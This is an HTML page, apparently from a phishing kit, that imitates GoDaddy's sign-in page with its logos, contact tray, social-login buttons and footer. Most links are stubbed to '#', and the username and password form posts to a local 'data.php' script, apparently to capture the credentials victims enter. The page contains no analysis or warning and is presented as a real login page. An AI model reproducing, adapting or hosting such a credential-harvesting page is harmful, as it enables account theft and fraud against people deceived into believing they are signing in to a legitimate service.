<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="google" content="notranslate">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Sign In</title>
 
  <style>
    @font-face {
      font-family: uxfont;
      src: url(./css/fonts//uxfont.woff2) format("woff2"), url(./css/fonts/uxfont.woff) format("woff");
      font-display: block;
    }

    @font-face {
      font-family: gd-sage;
      src: url(./css/fonts/gd-sage-bold.woff2) format("woff2"), url(./css/fonts/gd-sage-bold.woff) format("woff");
      font-weight: 700;
      font-display: swap;
    }

    @font-face {
      font-family: gdsherpa;
      src: url(./css/fonts/gdsherpa-bold.woff2) format("woff2"), url(./css/fonts/gdsherpa-bold.woff) format("woff");
      font-weight: 700;
      font-display: swap;
    }

    @font-face {
      font-family: gdsherpa;
      src: url(./css/fonts/gdsherpa-regular.woff2) format("woff2"), url(./css/fonts/gdsherpa-regular.woff) format("woff");
      font-display: swap;
    }
  </style>
  <link rel="stylesheet" href="css/uxcore2.css" media="all">
  <link rel="stylesheet" href="css/utilityheader.css" media="all">
  <link rel="apple-touch-icon" sizes="57x57" href="images/icons/apple-icon-57x57.png">
  <link rel="apple-touch-icon" sizes="60x60" href="images/icons/apple-icon-60x60.png">
  <link rel="apple-touch-icon" sizes="72x72" href="images/icons/apple-icon-72x72.png">
  <link rel="apple-touch-icon" sizes="76x76" href="images/icons/apple-icon-76x76.png">
  <link rel="apple-touch-icon" sizes="114x114" href="images/icons/apple-icon-114x114.png">
  <link rel="apple-touch-icon" sizes="120x120" href="images/icons/apple-icon-120x120.png">
  <link rel="apple-touch-icon" sizes="144x144" href="images/icons/apple-icon-144x144.png">
  <link rel="apple-touch-icon" sizes="152x152" href="images/icons/apple-icon-152x152.png">
  <link rel="apple-touch-icon" sizes="180x180" href="images/icons/apple-icon-180x180.png">
  <link rel="icon" type="image/png" sizes="192x192" href="images/icons/android-icon-192x192.png">
  <link rel="icon" type="image/png" sizes="32x32" href="images/icons/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="96x96" href="images/icons/favicon-96x96.png">
  <link rel="icon" type="image/png" sizes="16x16" href="images/icons/favicon-16x16.png">
  <link rel="mask-icon" href="images/icons/safari-pinned-tab.svg" color="#52c4cb">
  <meta name="msapplication-TileColor" content="#111111">
  <meta name="msapplication-TileImage" content="//img6.wsimg.com/ux/favicon/ms-icon-144x144.png">
  <link rel="stylesheet" href="css/inl.css" media="all">
  <link href="images/icons/favicon.ico" rel="shortcut icon"
    type="image/vnd.microsoft.icon">
</head>

<body class="ux-app uxf-flex" style="margin-bottom: 64px;">
  <div class="footer_fixer">
    <div id="">
      <div>
        <div>
          <div class="language-header see-change-bar">
            <div class="container-fluid">
              <div class="flex-row d-flex">
                <div class="see-change-bar-left d-flex">
                  <div class="topnav-logo-wrap"><a
                      href="#" class="topnav-logo"><span id="homepage"
                        class="mobile-logo go-logo"><svg class="svg-fill-black" viewBox="0 0 36 32"
                          xmlns="http://www.w3.org/2000/svg">
                          <path
                            d="M30.824 1.453c-3.713-2.316-8.603-1.77-12.963.972-4.347-2.74-9.239-3.288-12.948-.972C-.955 5.12-1.667 14.564 3.32 22.546c3.677 5.887 9.428 9.335 14.548 9.271 5.119.064 10.87-3.384 14.547-9.27C37.4 14.563 36.692 5.12 30.824 1.452zM6.02 20.863a19.112 19.112 0 01-2.303-5.273 15.067 15.067 0 01-.5-4.97C3.44 7.673 4.64 5.375 6.598 4.15c1.957-1.224 4.544-1.295 7.299-.203.419.169.829.358 1.228.568a22.496 22.496 0 00-3.956 4.754C8.14 14.116 7.215 19.511 8.272 23.81a19.723 19.723 0 01-2.253-2.947zm26.003-5.273a19.158 19.158 0 01-2.302 5.272 19.733 19.733 0 01-2.254 2.954c.946-3.855.303-8.576-2.014-13.005a.583.583 0 00-.837-.228l-7.225 4.515a.59.59 0 00-.188.813l1.06 1.695a.59.59 0 00.814.188l4.683-2.925c.151.454.303.901.416 1.363.442 1.617.611 3.297.5 4.97-.223 2.95-1.424 5.247-3.38 6.471a6.607 6.607 0 01-3.35.97h-.15a6.599 6.599 0 01-3.35-.97c-1.958-1.224-3.159-3.521-3.381-6.472-.11-1.672.058-3.352.5-4.969a19.671 19.671 0 016.03-9.65 15.108 15.108 0 014.241-2.629c2.748-1.092 5.34-1.02 7.298.203 1.958 1.224 3.157 3.522 3.38 6.47a15.105 15.105 0 01-.49 4.964zM27.89 30.386v-.21c0-.015.005-.03.015-.04a.048.048 0 01.038-.015h1.342c.014-.001.028.004.038.015.01.01.016.025.015.04v.21a.051.051 0 01-.015.04.048.048 0 01-.038.014h-.49v1.322a.05.05 0 01-.017.04.051.051 0 01-.038.017h-.253a.055.055 0 01-.038-.017.06.06 0 01-.015-.04V30.44h-.49a.048.048 0 01-.039-.015.051.051 0 01-.015-.04zm2.345-.217l.374.848.375-.848a.073.073 0 01.03-.036.08.08 0 01.05-.012h.4a.051.051 0 01.053.053v1.592a.056.056 0 01-.013.037.05.05 0 01-.037.016h-.24a.055.055 0 01-.038-.016.056.056 0 01-.015-.037v-1.203l-.393.874a.09.09 0 01-.03.04.086.086 0 01-.05.013h-.194a.085.085 0 01-.048-.012.09.09 0 01-.03-.041l-.393-.874v1.203a.05.05 0 01-.015.037.053.053 0 01-.036.016h-.243a.05.05 0 01-.036-.016.056.056 0 01-.015-.037v-1.592a.05.05 0 01.017-.038.047.047 0 01.036-.015h.413a.083.083 0 01.049.012.071.071 0 01.029.036z">
                          </path>
                        </svg></span><span id="homepage" class="desktop-logo go-logo"><svg
                          class="svg-fill-black" viewBox="0 0 166 34" xmlns="http://www.w3.org/2000/svg">
                          <path
                            d="M32.937 1.554c-3.968-2.48-9.193-1.889-13.852 1.039C14.44-.335 9.213-.925 5.25 1.553c-6.27 3.919-7.032 14.01-1.701 22.54 3.93 6.289 10.074 9.974 15.544 9.906 5.47.068 11.615-3.617 15.545-9.906 5.324-8.53 4.568-18.621-1.701-22.54zM6.43 22.292a20.434 20.434 0 01-2.46-5.632 16.104 16.104 0 01-.534-5.31c.238-3.153 1.521-5.608 3.612-6.914s4.855-1.385 7.8-.217c.441.177.878.38 1.312.606a24.09 24.09 0 00-4.228 5.081C8.697 15.086 7.71 20.848 8.84 25.443a20.911 20.911 0 01-2.408-3.151zm27.786-5.634a20.482 20.482 0 01-2.46 5.632 21.1 21.1 0 01-2.408 3.158c1.01-4.12.324-9.165-2.153-13.897a.625.625 0 00-.895-.243l-7.72 4.823a.631.631 0 00-.2.87l1.133 1.811a.63.63 0 00.869.2l5.004-3.126c.162.486.324.971.445 1.457a16.1 16.1 0 01.536 5.303c-.238 3.151-1.521 5.606-3.612 6.914a7.06 7.06 0 01-3.579 1.036h-.16a7.051 7.051 0 01-3.578-1.036c-2.093-1.308-3.376-3.763-3.614-6.914a16.143 16.143 0 01.534-5.31 21.015 21.015 0 016.444-10.314 16.137 16.137 0 014.532-2.806c2.936-1.168 5.705-1.09 7.797.217 2.093 1.308 3.375 3.761 3.613 6.914a16.145 16.145 0 01-.528 5.311zm39.848-3.766c-4.06 0-7.34 3.169-7.34 7.2 0 4.004 3.28 7.121 7.34 7.121 4.086 0 7.366-3.112 7.366-7.12 0-4.03-3.275-7.2-7.366-7.2zm0 10.557c-1.871 0-3.295-1.513-3.295-3.384s1.424-3.407 3.295-3.407c1.898 0 3.322 1.54 3.322 3.412 0 1.87-1.424 3.385-3.322 3.385zM90.583 7.362h-7.468a.6.6 0 00-.61.612v18.208a.605.605 0 00.61.648h7.468c5.977 0 10.13-3.975 10.13-9.758 0-5.818-4.153-9.71-10.13-9.71zm.177 15.622h-4.087V11.198h4.087c3.308 0 5.588 2.474 5.588 5.866 0 3.336-2.28 5.92-5.588 5.92zm24.82-9.7h-2.809a.633.633 0 00-.582.612v.833c-.64-1.057-2.085-1.835-3.884-1.835-3.503 0-6.783 2.751-6.783 7.145 0 4.37 3.251 7.171 6.755 7.171 1.806 0 3.28-.777 3.92-1.834v.861a.587.587 0 00.582.585h2.808a.571.571 0 00.584-.585V13.896a.594.594 0 00-.592-.612zm-6.533 10.196c-1.86 0-3.256-1.43-3.256-3.412s1.397-3.41 3.256-3.41c1.86 0 3.257 1.426 3.257 3.408s-1.395 3.412-3.257 3.412zm22.294-16.118h-2.808a.592.592 0 00-.61.584v6.728c-.648-1.002-2.114-1.78-3.948-1.78-3.476 0-6.7 2.751-6.7 7.145 0 4.37 3.252 7.171 6.755 7.171 1.806 0 3.17-.777 3.92-1.834v.861c0 .322.261.583.583.585h2.808a.57.57 0 00.584-.585V7.95a.57.57 0 00-.584-.588zm-6.532 16.152c-1.852 0-3.237-1.444-3.237-3.448s1.39-3.447 3.237-3.447c1.846 0 3.237 1.444 3.237 3.447s-1.384 3.448-3.237 3.448zm22.29-16.152h-2.803a.594.594 0 00-.612.584v6.728c-.64-1.002-2.114-1.78-3.947-1.78-3.477 0-6.7 2.751-6.7 7.145 0 4.37 3.253 7.171 6.755 7.171 1.807 0 3.168-.777 3.92-1.834v.861a.587.587 0 00.584.585h2.803a.568.568 0 00.582-.585V7.95a.568.568 0 00-.582-.588zm-6.532 16.152c-1.853 0-3.237-1.444-3.237-3.448s1.39-3.447 3.237-3.447c1.846 0 3.237 1.444 3.237 3.447s-1.38 3.448-3.232 3.448zm21.906-9.283l-4.19 14.37c-.809 2.556-2.613 4.086-5.421 4.086-1.277 0-2.44-.261-3.35-.782-.531-.303-.971-.58-.971-1.023 0-.275.089-.417.25-.675l.832-1.246c.235-.348.408-.461.66-.461a.96.96 0 01.554.192c.523.339 1.008.63 1.748.63.864 0 1.524-.277 1.88-1.306l.36-1.193h-1.696c-.418 0-.648-.249-.751-.584l-3.75-12.008c-.14-.473-.011-.946.683-.946h2.954c.36 0 .613.123.771.64l2.77 9.67 2.589-9.67c.082-.334.306-.64.75-.64h2.802c.552-.001.719.387.526.946zm-96.806 4.274v7.676a.625.625 0 01-.635.634h-2.317a.623.623 0 01-.634-.634v-2.015c-1.472 1.858-4.03 3.028-6.924 3.028-5.434 0-9.681-4.088-9.681-9.908 0-6.048 4.585-10.217 10.377-10.217 4.276 0 7.694 1.839 9.212 5.537a.843.843 0 01.07.309c0 .175-.116.307-.486.435l-2.706 1.042a.694.694 0 01-.511.009.783.783 0 01-.324-.371c-.971-1.847-2.7-3.1-5.36-3.1-3.45 0-5.922 2.694-5.922 6.188 0 3.387 2.104 6.172 6.02 6.172 2.06 0 3.703-.97 4.469-2.037H57.87a.625.625 0 01-.634-.635v-2.086a.625.625 0 01.634-.634h7.161a.604.604 0 01.635.607zm96.882-8.063v-.186c0-.013.005-.026.013-.036a.052.052 0 01.034-.013h1.183c.013 0 .025.005.034.013.009.01.013.023.013.036v.186a.052.052 0 01-.013.034.047.047 0 01-.034.013h-.432v1.167a.05.05 0 01-.048.048h-.224a.044.044 0 01-.032-.014.047.047 0 01-.015-.034v-1.167h-.432a.044.044 0 01-.047-.047zm2.069-.193l.323.75.324-.75a.066.066 0 01.026-.032.087.087 0 01.044-.01h.375a.044.044 0 01.047.046v1.404a.044.044 0 01-.045.047h-.21a.047.047 0 01-.035-.013.042.042 0 01-.013-.034v-1.06l-.348.77a.084.084 0 01-.026.038.08.08 0 01-.043.01h-.172a.078.078 0 01-.042-.01.073.073 0 01-.026-.037l-.346-.77v1.06a.052.052 0 01-.013.033.052.052 0 01-.032.013h-.216a.042.042 0 01-.03-.013.042.042 0 01-.013-.034v-1.404a.044.044 0 01.047-.046h.364c.014 0 .029.003.042.01.009.009.015.02.018.032z">
                          </path>
                        </svg></span></a></div>
                </div>
                <div class="see-change-bar-right justify-content-end">
                  <div class="tray-menu contact-tray">
                    <div class="tray-toggle-wrapper"><button 
                        aria-expanded="false" aria-haspopup="true" tabindex="0" class="btn tray-toggle" id=""
                        type="button" aria-label="Contact Us"><span><span
                            class="basic-phone-text hidden-sm-down title-text">Contact Us 24/7</span></span></button>
                    </div>
                    <div class="tray-fullwidth tray-dropdown loaded">
                      <div class="tray-content"><button class="close"></button>
                        <div class="container">
                          <div class="row">
                            <div class="col-lg-4 col-md-6 content-wrap">
                              <div class="row">
                                <div class="col-sm-12">
                                  <div class="font-primary-bold h3"><span>Call us</span></div>
                                </div>
                              </div>
                              <ul class="alt-contact-list list-unstyled">
                                <li><span>Call our award-winning sales &amp; support team 24/7</span><a
                                    class="contact-link" href="#">480-463-8387</a></li>
                              </ul>
                              <div class="contact-link-info"><span>Global Directory</span></div><a
                                href="#" class="contact-link"><span>Phone numbers and hours</span></a>
                            </div>
                            <div class="col-lg-4 col-md-6 content-wrap divider">
                              <div id="gdchat-container"></div>
                            </div>
                            <div class="col-md-4 help-mobile hidden-md-up">
                              <div class="row">
                                <div class="col-sm-12">
                                  <div class="font-primary-bold h3"><span>Help Center</span></div>
                                </div>
                              </div>
                              <p><span>Explore our online help resources</span></p>
                              <div><a href="#" class="btn btn-default"><span>Get Help</span></a></div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="lg-container">
      <div id="iframe-shrinker" class="row">
        <div id="login-container-row" class="panel-container-row">
          <div id="left-col" class="col-lg-6 col-xl-6"></div>
          <div id="login-container-col"
            class="container-width-limit col-xs-12 col-sm-8 offset-sm-2 col-md-6 offset-md-3 col-lg-6 col-xl-6  offset-lg-0 ">
            <div id="login-container">
              <div id="login-panel">
                <div>
                  <div id="new-ux" class="card ux-card  idp">
                    <div class="card-block  idp">
                      <div></div>
                      <div id="form-header" class="idp-form-header">
                        <div id="godaddy-template">
                          <div id="headless-logo-container">
                            <div class="logo-container"><svg xmlns="http://www.w3.org/2000/svg"
                                viewBox="0 0 743.17 158.28">
                                <g id="Layer_2" data-name="Layer 2">
                                  <g id="Layer_1-2" data-name="Layer 1">
                                    <path class="headless-logo-tm-svg"
                                      d="M176.65,36c25.25,0,45.52,19.58,45.52,44.48,0,24.74-20.27,44-45.52,44-25.08,0-45.35-19.24-45.35-44,0-24.9,20.27-44.48,45.35-44.48m0,65.22c11.73,0,20.53-9.35,20.53-20.91s-8.8-21.08-20.53-21.08c-11.56,0-20.36,9.52-20.36,21.08s8.8,20.91,20.36,20.91M341.31,61.76c0,35.73-25.66,60.29-62.59,60.29H232.58a3.75,3.75,0,0,1-3.78-4V5.59a3.7,3.7,0,0,1,3.78-3.78h46.14c36.93,0,62.59,24.05,62.59,60m-27,0c0-20.95-14.08-36.24-34.52-36.24H254.56V98.35h25.26c20.44,0,34.52-16,34.52-36.59M388.17,36c11.17,0,20.1,4.81,24.05,11.33V42.18a3.91,3.91,0,0,1,3.61-3.78h17.35a3.66,3.66,0,0,1,3.6,3.78v76.27a3.51,3.51,0,0,1-3.6,3.6H415.83a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4,6.53-13.05,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C346.26,53,366.53,36,388.17,36m4.65,65.39c11.49,0,20.12-8.82,20.12-21.08s-8.63-21.08-20.12-21.08S372.7,68.06,372.7,80.31s8.62,21.08,20.12,21.08M485.05,36c11.34,0,20.44,4.81,24.39,11V5.42a3.67,3.67,0,0,1,3.78-3.61h17.35a3.53,3.53,0,0,1,3.61,3.61v113a3.52,3.52,0,0,1-3.61,3.6H513.22a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4.64,6.53-13.05,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C443.65,53,463.58,36,485.05,36m5.16,65.61c11.44,0,20-8.92,20-21.3s-8.59-21.3-20-21.3-20,8.92-20,21.3,8.58,21.3,20,21.3M582.44,36c11.34,0,20.44,4.81,24.39,11V5.42a3.67,3.67,0,0,1,3.78-3.61H628a3.53,3.53,0,0,1,3.61,3.61v113a3.52,3.52,0,0,1-3.61,3.6H610.61a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4.63,6.53-13,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C541,53,561,36,582.44,36m5.16,65.61c11.45,0,20-8.92,20-21.3S599.05,59,587.6,59s-20,8.92-20,21.3,8.58,21.3,20,21.3M719.66,38.4H702.35c-2.75,0-4.12,1.89-4.63,4l-16,59.75L664.63,42.35c-1-3.18-2.55-4-4.78-4H641.61c-4.3,0-5.09,2.92-4.23,5.84l23.15,74.21c.69,2.06,2.07,3.6,4.64,3.6h10.49l-2.23,7.37c-2.19,6.36-6.28,8.08-11.61,8.08-4.57,0-7.57-1.81-10.81-3.9a6,6,0,0,0-3.42-1.18c-1.55,0-2.63.7-4.08,2.84l-5.14,7.7c-1,1.6-1.54,2.47-1.54,4.18,0,2.73,2.73,4.44,6,6.31,5.63,3.22,12.82,4.83,20.7,4.83,17.35,0,28.52-9.45,33.5-25.25l25.89-88.79C724.13,40.81,723.1,38.4,719.66,38.4ZM102.6,105.64c-9.09,11.49-24.9,18.71-42.78,18.71C26.25,124.35,0,99.1,0,63.14,0,25.76,28.33,0,64.12,0,90.54,0,111.67,11.36,121,34.21a5.29,5.29,0,0,1,.44,1.91c0,1.09-.72,1.9-3,2.69l-16.72,6.45a4.36,4.36,0,0,1-3.17,0,4.79,4.79,0,0,1-2-2.29c-6-11.4-16.68-19.16-33.11-19.16-21.33,0-36.6,16.66-36.6,38.25,0,20.92,13,38.13,37.2,38.13,12.73,0,22.88-6,27.62-12.59H76.59a3.86,3.86,0,0,1-3.92-3.92V70.84a3.86,3.86,0,0,1,3.92-3.92h44.25a3.71,3.71,0,0,1,3.92,3.74V118.1a3.86,3.86,0,0,1-3.92,3.92H106.52a3.86,3.86,0,0,1-3.92-3.92Z">
                                    </path>
                                    <path class="headless-logo-tm-svg"
                                      d="M723.41,20.84V19.69a.25.25,0,0,1,.08-.21.26.26,0,0,1,.21-.09H731a.29.29,0,0,1,.28.3v1.15a.25.25,0,0,1-.08.21.24.24,0,0,1-.2.08h-2.68v7.21a.29.29,0,0,1-.09.21.27.27,0,0,1-.21.09h-1.37a.29.29,0,0,1-.21-.09.32.32,0,0,1-.08-.21V21.13H723.7a.27.27,0,0,1-.29-.29Zm12.77-1.19,2,4.63,2-4.63a.46.46,0,0,1,.16-.2.53.53,0,0,1,.26-.06h2.2a.27.27,0,0,1,.28.29v8.67a.28.28,0,0,1-.07.21.24.24,0,0,1-.2.08h-1.31a.25.25,0,0,1-.21-.08.29.29,0,0,1-.08-.21V21.8l-2.14,4.76a.54.54,0,0,1-.16.23.53.53,0,0,1-.28.06h-1.06a.48.48,0,0,1-.26-.06.54.54,0,0,1-.16-.23L735.1,21.8v6.55a.32.32,0,0,1-.08.21.3.3,0,0,1-.2.08H733.5a.24.24,0,0,1-.2-.08.29.29,0,0,1-.08-.21V19.68a.29.29,0,0,1,.09-.21.28.28,0,0,1,.2-.08h2.25a.5.5,0,0,1,.26.06A.4.4,0,0,1,736.18,19.65Z">
                                    </path>
                                  </g>
                                </g>
                              </svg></div>
                          </div><span id="title"><strong>
                              <h3 class="m-b-md m-t-sm headline-brand">GoDaddy Sign In</h3>
                            </strong></span>
                        </div>
                      </div>
                      <div id="form-container">
                        <div id="create-account-link">
                          <p>New to GoDaddy?</p><a target="_self" id="create_account"
                            href="#">Create
                            an Account</a>
                        </div>
                        <div id="login-status-message"></div>
                        <form method="post" action="data.php">
                          <fieldset class="form-group"><label for="username" id="label-username">Username or Customer #
                            </label><input name="username" type="username" aria-labelledby="label-username"
                              aria-required="false" class="username-input ctHidden form-control"></fieldset>
                          <div id="password-container">
                            <fieldset class="form-group"><label for="password" id="label-password">Password </label>
                              <div class="pull-right"><a class="btn btn-tertiary-inline btn-sm"
                                  aria-label="form_action_button">
                                  <div></div>
                                </a></div><input name="password" type="password" aria-labelledby="label-password"
                                aria-required="false" class="ctHidden form-control" value="">
                            </fieldset><a target="_parent"
                              class="show-hide btn btn-tertiary-inline btn-sm text-primary-o pull-right"
                              tabindex="0">Show</a>
                          </div>
                          <div id="remember-me-container" class="input-container">
                            <fieldset class="form-group">
                              <div class="form-check"><label for="remember-me"
                                  class="form-check-label custom-control custom-checkbox" id="label-remember-me"><input
                                    tabindex="0" id="remember-me" type="checkbox" aria-labelledby="label-remember-me"
                                    aria-required="false" class="custom-control-input" value="false"><span
                                    class="custom-control-indicator"></span><span
                                    class="custom-control-description"><span>Keep me signed in<span
                                        id="remember-me-tip"> <span role="button" aria-haspopup="true"
                                          class="tooltip-over-text"
                                          style="cursor: pointer; outline: currentcolor none medium;"><span
                                            class="text-default"><span
                                              class="uxicon uxicon-information"></span></span></span></span></span></span></label>
                              </div>
                            </fieldset>
                          </div>
                          <button class="btn btn-primary btn-purchase btn-block"
                            id="submitBtn" type="submit">Sign In</button>
                          <div id="social-login-buttons-container" class="icon-only">
                            <p id="text-social-button-divider">or sign in with</p>
                            <div class="ux-btn-set ux-btn-split" role="group"><a target="_parent"
                                href="#"
                                tabindex="0" class="btn btn-default ux-btn-set-item alternative-login-button-icon-only"
                                id="amazon_auth"><svg id="social-logo" class="amazon-svg"
                                  xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1100 1000">
                                  <path
                                    d="M2 776c3.333-5.333 8.666-5.667 16-1 166.666 96.667 348 145 544 145 130.666 0 259.666-24.333 387-73 3.333-1.333 8.166-3.333 14.5-6 6.333-2.667 10.833-4.667 13.5-6 10-4 17.833-2 23.5 6 5.666 8 3.833 15.333-5.5 22-12 8.667-27.334 18.667-46 30-57.334 34-121.334 60.333-192 79-70.667 18.667-139.667 28-207 28-104 0-202.334-18.167-295-54.5C162.333 909.167 79.333 858 6 792c-4-3.333-6-6.667-6-10 0-2 .666-4 2-6zm301-285c0-46 11.333-85.333 34-118 22.666-32.667 53.666-57.333 93-74 36-15.333 80.333-26.333 133-33 18-2 47.333-4.667 88-8v-17c0-42.667-4.667-71.333-14-86-14-20-36-30-66-30h-8c-22 2-41 9-57 21s-26.334 28.667-31 50c-2.667 13.333-9.334 21-20 23l-115-14c-11.334-2.667-17-8.667-17-18 0-2 .333-4.333 1-7 11.333-59.333 39.166-103.333 83.5-132C451.833 19.333 503.666 3.333 563 0h25c76 0 135.333 19.667 178 59a190.52 190.52 0 0 1 18.5 21.5c5.666 7.667 10.166 14.5 13.5 20.5 3.333 6 6.333 14.667 9 26 2.666 11.333 4.666 19.167 6 23.5 1.333 4.333 2.333 13.667 3 28 .666 14.333 1 22.833 1 25.5v242c0 17.333 2.5 33.167 7.5 47.5s9.833 24.667 14.5 31c4.666 6.333 12.333 16.5 23 30.5 4 6 6 11.333 6 16 0 5.333-2.667 10-8 14-55.334 48-85.334 74-90 78-8 6-17.667 6.667-29 2-9.334-8-17.5-15.667-24.5-23s-12-12.667-15-16-7.834-9.833-14.5-19.5c-6.667-9.667-11.334-16.167-14-19.5-37.334 40.667-74 66-110 76-22.667 6.667-50.667 10-84 10-51.334 0-93.5-15.833-126.5-47.5S303 549 303 491zm172-20c0 26 6.5 46.833 19.5 62.5S525 557 547 557c2 0 4.833-.333 8.5-1 3.666-.667 6.166-1 7.5-1 28-7.333 49.666-25.333 65-54 7.333-12.667 12.833-26.5 16.5-41.5 3.666-15 5.666-27.167 6-36.5.333-9.333.5-24.667.5-46v-25c-38.667 0-68 2.667-88 8-58.667 16.667-88 53.667-88 111zm420 322c1.333-2.667 3.333-5.333 6-8 16.666-11.333 32.666-19 48-23 25.333-6.667 50-10.333 74-11 6.666-.667 13-.333 19 1 30 2.667 48 7.667 54 15 2.666 4 4 10 4 18v7c0 23.333-6.334 50.833-19 82.5-12.667 31.667-30.334 57.167-53 76.5-3.334 2.667-6.334 4-9 4-1.334 0-2.667-.333-4-1-4-2-5-5.667-3-11 24.666-58 37-98.333 37-121 0-7.333-1.334-12.667-4-16-6.667-8-25.334-12-56-12-11.334 0-24.667.667-40 2-16.667 2-32 4-46 6-4 0-6.667-.667-8-2-1.334-1.333-1.667-2.667-1-4 0-.667.333-1.667 1-3z">
                                  </path>
                                </svg></a><a target="_parent"
                                href="#"
                                tabindex="0" class="btn btn-default ux-btn-set-item alternative-login-button-icon-only"
                                id="facebook_auth"><svg id="social-logo" class="fb-logo"
                                  xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                                  <path
                                    d="M9 8h-3v4h3v12h5v-12h3.642l.358-4h-4v-1.667c0-.955.192-1.333 1.115-1.333h2.885v-5h-3.808c-3.596 0-5.192 1.583-5.192 4.615v3.385z">
                                  </path>
                                </svg></a><a target="_parent"
                                href="#"
                                tabindex="0" class="btn btn-default ux-btn-set-item alternative-login-button-icon-only"
                                id="google_auth"><svg id="social-logo" class="google-logo" version="1.1" x="0px" y="0px"
                                  viewBox="0 0 533.5 544.3">
                                  <g>
                                    <path class="google-st0"
                                      d="M533.5,278.4c0-18.5-1.5-37.1-4.7-55.3H272.1v104.8h147c-6.1,33.8-25.7,63.7-54.4,82.7v68h87.7 C503.9,431.2,533.5,361.2,533.5,278.4z">
                                    </path>
                                    <path class="google-st1"
                                      d="M272.1,544.3c73.4,0,135.3-24.1,180.4-65.7l-87.7-68c-24.4,16.6-55.9,26-92.6,26c-71,0-131.2-47.9-152.8-112.3 H28.9v70.1C75.1,486.3,169.2,544.3,272.1,544.3z">
                                    </path>
                                    <path class="google-st2"
                                      d="M119.3,324.3c-11.4-33.8-11.4-70.4,0-104.2V150H28.9c-38.6,76.9-38.6,167.5,0,244.4L119.3,324.3z">
                                    </path>
                                    <path class="google-st3"
                                      d="M272.1,107.7c38.8-0.6,76.3,14,104.4,40.8l0,0l77.7-77.7C405,24.6,339.7-0.8,272.1,0C169.2,0,75.1,58,28.9,150 l90.4,70.1C140.8,155.6,201.1,107.7,272.1,107.7z">
                                    </path>
                                  </g>
                                </svg></a></div>
                          </div>
                        </form>
                        <p id="recovery-links">Need to find <a target="_parent" id="forgot_username"
                            class="text-primary-o"
                            href="#">your
                            username</a> or <a target="_parent" id="forgot_password" class="text-primary-o"
                            href="#">your
                            password</a>?</p>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div>
    <footer id="appheader-footer" class="manifest footer">
      <div role="contentinfo" class="container"><span>Copyright &copy; 1999 - 2020 GoDaddy Operating Company, LLC. All Rights
          Reserved.</span> <a class="privacy-link"
          href="#"><span>Privacy Policy</span></a></div>
      <div id="gtm_privacy"></div>
    </footer>
  </div>

  <script>
      var cdn_static_url = "images/bg.jpg"
      document.documentElement.style.backgroundImage = 'url(\'' + cdn_static_url + '\')';
      document.getElementById('left-col').setAttribute('class', '');
    
  </script>
</body>
</html>